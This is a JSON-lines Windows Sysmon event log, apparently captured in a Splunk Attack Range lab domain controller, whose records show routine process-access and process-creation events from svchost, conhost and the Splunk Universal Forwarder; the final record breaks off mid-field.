{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10B2-5F25-0000-001047F00400}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10B2-5F25-0000-001047F00400}","TargetProcessId":"4560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.387\r\nSourceProcessGUID: {E2A3D6B1-10B2-5F25-0000-001047F00400}\r\nSourceProcessId: 4560\r\nSourceThreadId: 4572\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.387","SourceProcessGUID":"{E2A3D6B1-10B2-5F25-0000-001047F00400}","SourceProcessId":"4560","SourceThreadId":"4572","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.140\r\nProcessGuid: {E2A3D6B1-10B3-5F25-0000-00100EF20400}\r\nProcessId: 4732\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.140","ProcessGuid":"{E2A3D6B1-10B3-5F25-0000-00100EF20400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-00100EF20400}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program 